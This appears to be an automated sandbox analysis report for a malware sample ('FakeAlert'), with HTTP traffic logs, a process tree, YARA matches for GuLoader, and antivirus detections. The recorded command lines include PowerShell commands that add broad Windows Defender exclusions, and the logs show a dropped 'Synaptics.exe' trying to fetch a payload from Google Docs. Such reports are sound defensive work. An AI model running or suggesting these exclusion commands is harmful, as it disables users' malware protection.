                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC23INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC23INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 66 34 6c 6c 55 4d 31 5f 61 35 79 52 6e 76 63 7a 76 75 39 73 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                                                          Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="df4llUM1_a5yRnvczvu9sA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC25INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                                                          Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC25INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          8192.168.2.349749172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC22OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC25INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:20 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-sCDEfOABCSvIz84aGtWdbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC26INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC26INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 79 51 44 37 67 48 72 51 61 7a 7a 31 4b 53 6d 6c 6b 4d 51 76 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                                                          Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AyQD7gHrQazz1KSmlkMQvg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC28INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                                                          Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC28INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          9192.168.2.349750172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC25OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC28INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:20 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-oje0L9RWaQhTRD4wFQsMjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC29INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC29INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 5a 58 77 4c 73 57 64 62 78 39 74 75 45 6e 77 57 76 46 4e 30 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                                                          Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OZXwLsWdbx9tuEnwWvFN0w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC31INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                                                          Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC31INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                          Start time:04:37:41
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe"
                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                          File size:1490944 bytes
                                                                                                                                                                                                                          MD5 hash:C5BF732066AB84D1ABBA5B27638A5191
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, Author: Joe Security
                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                          Start time:04:37:41
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                                                                                                                                                                                                          Imagebase:0xc20000
                                                                                                                                                                                                                          File size:232960 bytes
                                                                                                                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                          Start time:04:37:42
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                          Imagebase:0x7ff7c9170000
                                                                                                                                                                                                                          File size:625664 bytes
                                                                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                          Start time:04:37:42
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:cmd /c start "" "C:\Users\user\AppData\Local\Temp\uniformerede.exe"
                                                                                                                                                                                                                          Imagebase:0xc20000
                                                                                                                                                                                                                          File size:232960 bytes
                                                                                                                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                          Start time:04:37:42
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                                                                                                                                                                                                          Imagebase:0x1010000
                                                                                                                                                                                                                          File size:430592 bytes
                                                                                                                                                                                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                          Start time:04:37:43
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                          Imagebase:0x7ff7c9170000
                                                                                                                                                                                                                          File size:625664 bytes
                                                                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                          Start time:04:37:43
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\uniformerede.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\uniformerede.exe"
                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                          File size:1270272 bytes
                                                                                                                                                                                                                          MD5 hash:FEDAD1ADEC8A1D90444051B5BDC6445D
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe, Author: Joe Security
                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                          Start time:04:37:48
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\._cache_uniformerede.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\._cache_uniformerede.exe"
                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                          File size:498497 bytes
                                                                                                                                                                                                                          MD5 hash:C4B2332489C0BA3E3F2A262F1C2C31B8
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.532970198.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                          Start time:04:37:50
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                          File size:771584 bytes
                                                                                                                                                                                                                          MD5 hash:2A1D1C20CCA885322254DD2A22F51097
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.357173364.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.348826366.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.285408477.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.361096693.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                          Start time:04:37:54
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                                                                                                                                                                                                          Imagebase:0x1010000
                                                                                                                                                                                                                          File size:430592 bytes
                                                                                                                                                                                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                          Start time:04:38:02
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                          File size:771584 bytes
                                                                                                                                                                                                                          MD5 hash:2A1D1C20CCA885322254DD2A22F51097
                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                                                                                                          Yara matches:
